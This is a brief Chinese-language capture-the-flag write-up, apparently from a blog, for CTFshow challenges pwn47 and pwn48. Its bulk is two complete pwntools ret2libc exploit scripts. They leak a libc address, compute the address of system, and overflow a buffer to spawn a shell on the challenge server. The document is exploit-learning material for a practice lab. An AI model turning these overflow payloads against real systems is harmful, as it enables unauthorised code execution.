
CTFshow pwn47-48

CTFshow pwn47-48

ret2libc的两道简单练习。
还是很不熟练。

pwn47

已经给出了/bin/sh的字符串,还有输出了许多函数的地址,所以很容易拿到libc。

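from pwn import *
from LibcSearcher import *

# pwn47: the binary already holds a "/bin/sh" string and prints the
# addresses of several libc functions, so only the libc base is needed.
context(os = 'linux', arch = 'i386', log_level = 'debug')
io = remote("pwn.challenge.ctf.show",28106 )
elf = ELF('./pwn')  # loaded for reference only; nothing below reads it
bin_sh = 0x804B028  # address of the "/bin/sh" string inside the binary

io.recvuntil("puts: ")
# Parse the leaked address as an integer literal instead of eval()-ing it:
# eval() would execute whatever text the remote service chooses to send.
# Base 0 accepts both "0x..." hex and plain decimal, which covers the
# integer literals eval() accepted before.
# NOTE(review): assumes the service prints the address as a bare number
# (e.g. "0xf7...") followed by a newline — confirm against the real output.
puts_addr = int(io.recvuntil("\n", drop = True).strip(), 0)
libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')        # leaked - symbol offset
system_addr = libc_base + libc.dump('system')
offset = 0x9c + 0x4   # buffer size + saved ebp, from the challenge
# ret2libc frame: padding, system, a dummy return address, then its argument.
payload = offset * b'a'
payload += p32(system_addr)
payload += p32(0)
payload += p32(bin_sh)
io.sendline(payload)
io.interactive()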
pwn48

有puts函数可以泄露地址,正常的ret2libc。

from pwn import *
from LibcSearcher import *
# pwn48: two-stage ret2libc. Stage 1 calls puts@plt on puts@got to leak a
# libc address and returns to main; stage 2 reuses the same overflow with
# the resolved libc addresses.
context(os = 'linux', arch = 'i386', log_level = 'debug')
io = remote("pwn.challenge.ctf.show", 28284)
elf = ELF('./pwn')
offset = 0x6B + 0x4   # buffer size + saved ebp, from the challenge
main_addr = elf.sym['main']
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
# Stage 1 frame: padding, puts@plt, return to main, argument puts@got.
payload = offset * b'a'
payload += p32(puts_plt)
payload += p32(main_addr)
payload += p32(puts_got)
io.sendline(payload)

#---------------

# The leak is read up to the first 0xf7 byte and the last four bytes are
# unpacked little-endian, so this assumes the leaked address has 0xf7 as
# its high byte — confirm on the target.
# NOTE(review): the delimiter is a str; pwntools encodes str arguments
# before matching, so a bytes literal (b'\xf7') would be unambiguous.
puts_addr = u32(io.recvuntil('\xf7')[-4:])
libc = LibcSearcher('puts', puts_addr)
libc_case = puts_addr - libc.dump('puts')        # libc base: leaked - offset
system_addr = libc_case + libc.dump('system')
bin_sh = libc_case + libc.dump('str_bin_sh')     # "/bin/sh" inside libc
# Stage 2 frame: padding, system, dummy return address, then its argument.
payload = offset * b'a'
payload += p32(system_addr)
payload += p32(0)
payload += p32(bin_sh)
io.sendline(payload)
io.interactive()